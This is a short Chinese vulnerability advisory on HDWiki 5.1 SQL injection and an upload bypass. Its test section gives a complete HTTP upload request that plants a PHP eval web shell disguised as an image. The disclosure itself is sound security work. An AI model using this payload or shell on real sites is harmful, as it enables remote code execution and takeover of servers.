HDWiki URI SQL注入漏洞

漏洞起因
输入验证错误
危险等级

影响系统
Hudong HDWiki 5.1

不受影响系统

危害
远程攻击者可以利用漏洞操作数据库或上传恶意文件获得SHELL。

攻击所需条件
攻击者必须访问HDWIKI。

漏洞信息
hdwiki是互动百科开发的一款免费建站,自助建站程序。
HDWIKI V5.0 基本上没有对输入的变量进行过滤,存在多个sql注入漏洞,如发表评论的地方存在代码注入问题。
另外HDwiki中某些上传功能存在安全漏洞,通过一些数据即可绕过上传限制,最终获得shell。

测试方法
POST /hdwiki/index.php?attachment-uploadimg HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.wooyun.org/
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=—————————7db261e100f2e
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)
Host: www.wooyun.org
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1298002704449; hd_sid=raG13H; hd_auth=4113YBBXXB13XtdR6EXTA1Cb9BuhZMK%2F29wdoHDQJTV5QZOoYd62OHd46iXKqf4Qz%2F5gc6pLm9fZ%2Bdgv68MT; hd_searchtime=1300983373
—————————–7db261e100f2e
Content-Disposition: form-data; name=”MAX_FILE_SIZE”
30000
—————————–7db261e100f2e
Content-Disposition: form-data; name=”photofile”; filename=”C:\fucker\z.php”
Content-Type: image/image
zzz<?eval($_REQUEST[z])?>
—————————–7db261e100f2e–

厂商解决方案
目前没有详细解决方案提供:
http://kaiyuan.hudong.com/

漏洞提供者
flyh4t

评论关闭。